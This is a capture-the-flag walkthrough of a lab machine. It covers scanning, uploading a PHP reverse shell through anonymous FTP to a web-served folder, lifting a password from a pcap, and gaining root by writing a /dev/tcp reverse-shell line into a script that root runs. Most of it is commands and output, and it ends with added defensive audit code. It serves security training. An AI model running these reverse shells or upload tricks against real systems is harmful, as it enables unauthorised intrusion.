Room Covers:

  • Discovery
  • Exploitation
  • Privilege Escalation (horizontal + vertical)

Target Details

  • IP: 10.10.115.38

Service and Content Discovery

  • Scan Machine with Nmap

    nmap -sC -sV -Pn -oN nmap.txt 10.10.115.38
    
    Nmap scan report for 10.10.115.38
    Host is up (0.38s latency).
    Not shown: 996 closed tcp ports (conn-refused)
    PORT     STATE    SERVICE VERSION
    21/tcp   open     ftp     vsftpd 3.0.3
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp [NSE: writeable]
    | -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
    |_-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to 10.x.x.x
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 2
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    22/tcp   open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
    |   256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
    |_  256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
    80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-title: Maintenance
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    1131/tcp filtered caspssl
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Sat Jul  2 13:34:28 2022 -- 1 IP address (1 host up) scanned in 64.99 seconds
    
    

    We can log in anonymously on FTP, and the ftp directory is writeable by anonymous users (drwxrwxrwx, flagged "[NSE: writeable]")

  • Services Discovered

    Service   Port   Version
    FTP       21     vsftpd 3.0.3
    SSH       22     OpenSSH 7.2p2
    HTTP      80     Apache httpd 2.4.18

  • Visiting the HTTP site in a browser doesn’t provide much information (the page title is just "Maintenance")

  • Finding directories using gobuster

    gobuster dir -u http://10.10.115.38 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 30 --no-error -o web-dirs.txt
    
  • Directories Found

    Directory   Link
    files       /files

  • On visiting /files we find a few files along with a notice directory

Accessing FTP

  • Login anonymously

    ftp 10.10.115.38
    
    Connected to 10.10.115.38.
    220 (vsFTPd 3.0.3)
    Name (10.10.115.38:attacker): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp>
    

    Logged in successfully

  • list files

    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxrwxrwx    2 65534    65534        4096 Jul 02 09:09 ftp
    -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
    -rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
    

    These are the same files served by the web server under /files, so the FTP root maps to the web directory /files

Get Reverse Shell from Target Machine

  • Download php reverse shell

    wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
    
  • In the reverse shell script, change the IP to your TryHackMe VPN IP; the default port is 1234

  • Start Netcat listener

    nc -nlvp 1234
    
  • Upload via FTP anonymously

    ftp> cd ftp
    250 Directory successfully changed.
    ftp> put php-reverse-shell.php
    local: php-reverse-shell.php remote: php-reverse-shell.php
    200 PORT command successful. Consider using PASV.
    150 Ok to send data.
    226 Transfer complete.
    5596 bytes sent in 0.00 secs (53.3676 MB/s)
    ftp>s
    
  • From the browser, visit the /files/ftp/ directory and click on the reverse shell file; the shell connects back to the attacker’s terminal

    # nc -nlvp 1234
    listening on [any] 1234 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.115.38] 51642
    Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
     08:15:07 up 13 min,  0 users,  load average: 0.07, 0.51, 0.44
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
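
    The chain above works because anonymous FTP uploads land in a directory that the web server also serves and executes PHP from. Below is an added example, not part of the original writeup, of a small Python check a defender could run against vsftpd.conf to catch exactly that combination; the two sample configurations and the /var/www/html web-root path are constructed assumptions.

```python
# Added example (not from the original writeup): audit a vsftpd.conf for the
# pattern the scan exposed, anonymous upload into a directory the web server
# serves. The two configs and the web root path below are constructed.
import os

# Defaults from vsftpd.conf(5) for the options this check reads.
_DEFAULTS = {"anonymous_enable": "YES", "write_enable": "NO", "anon_upload_enable": "NO"}

def parse_vsftpd_conf(text):
    """Parse key=value lines; blank lines and # comments are skipped."""
    conf = dict(_DEFAULTS)
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, _, value = line.partition("=")
            conf[key.strip()] = value.strip()
    return conf

def _yes(conf, key):
    return conf.get(key, "NO").upper() == "YES"

def audit_vsftpd(text, web_root):
    """Return findings for anonymous login, anonymous upload and an anon_root
    that sits under the web root (where an uploaded PHP file would be executed)."""
    conf = parse_vsftpd_conf(text)
    if not _yes(conf, "anonymous_enable"):
        return []
    findings = ["anonymous login enabled"]
    if _yes(conf, "write_enable") and _yes(conf, "anon_upload_enable"):
        findings.append("anonymous upload enabled")
    anon_root = conf.get("anon_root")  # unset: vsftpd uses the ftp user's home
    if anon_root and os.path.commonpath([anon_root, web_root]) == os.path.normpath(web_root):
        findings.append("anon_root %s is inside web root %s" % (anon_root, web_root))
    return findings

# Constructed configs: WEAK_CONF reproduces what the scan showed (anonymous
# login, writable ftp directory under /files); HARDENED_CONF removes it.
WEAK_CONF = "anonymous_enable=YES\nwrite_enable=YES\nanon_upload_enable=YES\n" \
            "anon_root=/var/www/html/files\n"
HARDENED_CONF = "anonymous_enable=NO\nlocal_enable=YES\nwrite_enable=YES\n" \
                "chroot_local_user=YES\n"
```

    Even with a clean config, the ftp directory itself must not be world-writable or sit under a DocumentRoot where PHP is executed; the config check only covers the first half of that.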
    

Search for First Flag

  • Find files

    $ whoami
    www-data
    $ ls
    bin
    boot
    dev
    etc
    home
    incidents
    initrd.img
    initrd.img.old
    lib
    lib64
    lost+found
    media
    mnt
    opt
    proc
    recipe.txt
    root
    run
    sbin
    snap
    srv
    sys
    tmp
    usr
    vagrant
    var
    vmlinuz
    vmlinuz.old
    
  • Read recipe.txt file

    $ cat recipe.txt
    Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was xxxx.
    
  • We need to escalate privileges to read the remaining files

Privilege Escalation

  • Finding files with the SUID bit set

    $ find / -perm -u=s -type f 2>/dev/null
    /bin/mount
    /bin/fusermount
    /bin/umount
    /bin/ping6
    /bin/su
    /bin/ping
    /usr/bin/passwd
    /usr/bin/pkexec
    /usr/bin/at
    /usr/bin/sudo
    /usr/bin/newuidmap
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/bin/newgidmap
    /usr/bin/gpasswd
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    /usr/lib/snapd/snap-confine
    /usr/lib/openssh/ssh-keysign
    /usr/lib/policykit-1/polkit-agent-helper-1
    

    Nothing of interest among these; they are all standard SUID binaries

  • Checking for Python so we can spawn a shell with a TTY

    $ python --version
    Python 2.7.12
    
  • Spawn a TTY shell so that sudo/su can be used

    python -c 'import pty; pty.spawn("/bin/bash")'
    www-data@startup:/$
    
  • In the /incidents directory we find a pcap file

    www-data@startup:/incidents$ ls -l
    total 32
    -rwxr-xr-x 1 www-data www-data 31224 Nov 12  2020 suspicious.pcapng
    
  • To analyze this file in Wireshark we first need to download it; copy it into the ftp directory so it can be fetched from the web server

    www-data@startup:/incidents$ cp suspicious.pcapng /var/www/html/files/ftp
    
  • Download the file from http://10.10.115.38/files/ftp/suspicious.pcapng

  • Load the file in Wireshark, right-click a TCP packet around number 200 and choose Follow -> TCP Stream; a list of commands appears in a new window, from which we can find the password

  • From the pcap file (Follow TCP Stream): user lennie, password c4ntg3txxxxxxxxxxx

  • Now, we can log into lennie’s account with the password

    su lennie
    Password:
    lennie@startup:~$
    

    We’ve successfully escalated privileges horizontally

Get User Flag

Escalating Privileges Vertically

  • Finding executables with the SUID bit set

    lennie@startup:~$ find / -perm -u=s -type f 2>/dev/null
    /bin/mount
    /bin/fusermount
    /bin/umount
    /bin/ping6
    /bin/su
    /bin/ping
    /usr/bin/passwd
    /usr/bin/pkexec
    /usr/bin/at
    /usr/bin/sudo
    /usr/bin/newuidmap
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/bin/newgidmap
    /usr/bin/gpasswd
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    /usr/lib/snapd/snap-confine
    /usr/lib/openssh/ssh-keysign
    /usr/lib/policykit-1/polkit-agent-helper-1
    

    let’s try sudo

  • get sudo executables list

    lennie@startup:~$ sudo -l
    [sudo] password for lennie: c4ntg3t3n0ughsp1c3
    Sorry, user lennie may not run sudo on startup.
    

    We cannot use the sudo command

  • There is a scripts folder in lennie’s home directory

    lennie@startup:~$ ls -l scripts
    total 8
    -rwxr-xr-x 1 root root 77 Nov 12  2020 planner.sh
    -rw-r--r-- 1 root root  1 Jul  2 10:42 startup_list.txt
    

    The planner.sh script belongs to the root user

  • Read planner.sh script

    lennie@startup:~$ cat scripts/planner.sh
    #!/bin/bash
    echo $LIST > /home/lennie/scripts/startup_list.txt
    /etc/print.sh
    

    The script calls another script, /etc/print.sh, with root privileges

  • Let’s analyze the print.sh script

    lennie@startup:~$ ls -l /etc/print.sh
    -rwx------ 1 lennie lennie 60 Jul  2 10:11 /etc/print.sh
    

    This script belongs to lennie, so we can overwrite it and use it to obtain a reverse shell with root access

  • Overwrite file contents

    echo "bash -c 'exec sudo bash -i &>/dev/tcp/10.x.x.x/9999 <&1'" > /etc/print.sh
    
  • Start netcat listener on attacker’s machine on port 9999

    nc -nlvp 9999
    listening on [any] 9999 ...
    
  • Execute planner.sh script

    bash /home/lennie/scripts/planner.sh
    
  • Get Reverse Shell

    nc -nlvp 9999
    listening on [any] 9999 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.115.38] 50290
    sudo: unable to resolve host startup
    bash: cannot set terminal process group (5564): Inappropriate ioctl for device
    bash: no job control in this shell
    root@startup:~#
    

    We’ve successfully obtained root privileges on the machine
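
    The root-run planner.sh hands execution to /etc/print.sh, which lennie owns, so whoever controls print.sh controls what root executes. As an added example (not from the original writeup), the Python below walks such a script chain and flags any hand-off into a file a non-root user can modify; the in-memory sample filesystem, uid 1000 for lennie and the fake stat records are constructed so it runs without root.

```python
# Added example (not from the original writeup): follow a root-run script into the
# scripts it calls and flag any a non-root user can rewrite (planner.sh -> print.sh).
import os
import re
import stat
from collections import namedtuple

# Absolute path used as a command at line start, or sourced via "source X" / ". X".
_CALL_RE = re.compile(r'^\s*(?:source\s+|\.\s+)?(/\S+)', re.MULTILINE)

def referenced_scripts(text):
    """Return absolute paths that a script body invokes or sources."""
    return _CALL_RE.findall(text)

def weak_permissions(st):
    """True if the file is owned by uid != 0 or is group/world writable."""
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_chain(script_path, read_fn=lambda p: open(p).read(), stat_fn=os.stat):
    """Walk script_path and every script it calls; return [(path, detail)]."""
    findings, seen, todo = [], set(), [script_path]
    while todo:
        cur = todo.pop()
        if cur in seen:
            continue
        seen.add(cur)
        try:
            st = stat_fn(cur)
        except OSError:
            continue  # referenced path does not exist; nothing to audit
        if weak_permissions(st):
            findings.append((cur, "uid=%d mode=%o" % (st.st_uid, stat.S_IMODE(st.st_mode))))
        todo.extend(referenced_scripts(read_fn(cur)))
    return findings

# Constructed in-memory sample mirroring the writeup: planner.sh is root-owned 0755
# and calls /etc/print.sh, which the unprivileged user (uid 1000 here) owns as 0700.
FakeStat = namedtuple("FakeStat", "st_uid st_mode")
SAMPLE_FS = {
    "/home/lennie/scripts/planner.sh": (FakeStat(0, stat.S_IFREG | 0o755),
        "#!/bin/bash\necho $LIST > /home/lennie/scripts/startup_list.txt\n/etc/print.sh\n"),
    "/etc/print.sh": (FakeStat(1000, stat.S_IFREG | 0o700), "#!/bin/bash\necho 'hi'\n"),
}

def _sample_stat(path):
    if path not in SAMPLE_FS:
        raise FileNotFoundError(path)
    return SAMPLE_FS[path][0]
def audit_sample():
    return audit_chain("/home/lennie/scripts/planner.sh",
                       read_fn=lambda p: SAMPLE_FS[p][1], stat_fn=_sample_stat)
```

    On a real host, call audit_chain on each root cron or startup script with the default read_fn/stat_fn; the fix for a finding is to make the called script root-owned and not writable by others.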

Get Root Flag